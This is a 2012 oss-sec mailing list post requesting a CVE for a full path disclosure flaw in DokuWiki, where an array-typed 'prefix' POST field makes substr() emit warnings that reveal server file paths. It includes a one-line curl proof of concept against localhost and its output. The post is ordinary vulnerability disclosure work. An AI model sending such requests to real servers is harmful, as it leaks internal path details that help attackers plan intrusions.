oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

CVE request: Full path disclosure in DokuWiki

From: Felipe Pena <felipensp () gmail com>
Date: Sun, 24 Jun 2012 09:40:13 -0300
Full path disclosure in DokuWiki
========================================
  DokuWiki is a simple to use Wiki aimed at the documentation needs of a small
company. It works on plain text files and thus needs no database. It has a
simple but powerful syntax which makes sure the datafiles remain readable
outside the Wiki.

  The POST input 'prefix' is not checked/casted for proper data type before
passing to PHP's substr() function, which lead to displays an warning with
sensitive information on server with PHP error level enabled:

  $PRE   = cleanText(substr($_POST['prefix'], 0, -1));

$ curl -dprefix[]=1 http://localhost/dokuwiki/doku.php 2> /dev/null |
grep Warning
<b>Warning</b>:  substr() expects parameter 1 to be string, array given in
<b>/var/www/dokuwiki/doku.php</b> on line <b>47</b><br />
<b>Warning</b>:  Cannot modify header information - headers already sent by
(output started at /var/www/dokuwiki/doku.php:47) in
<b>/var/www/dokuwiki/inc/actions.php</b> on line <b>180</b><br />

Affected versions:
========================================
- Angua (RC1)
- Rincewind
- Anteater

References:
========================================
http://www.freelists.org/post/dokuwiki/Fwd-DokuWiki-Full-path-disclosure

Credits:
========================================
This vulnerability was discovered by Felipe Pena.
Twitter: @felipensp

-- 
Regards,
Felipe Pena
Previous By Date Next
Previous By Thread Next

Current thread: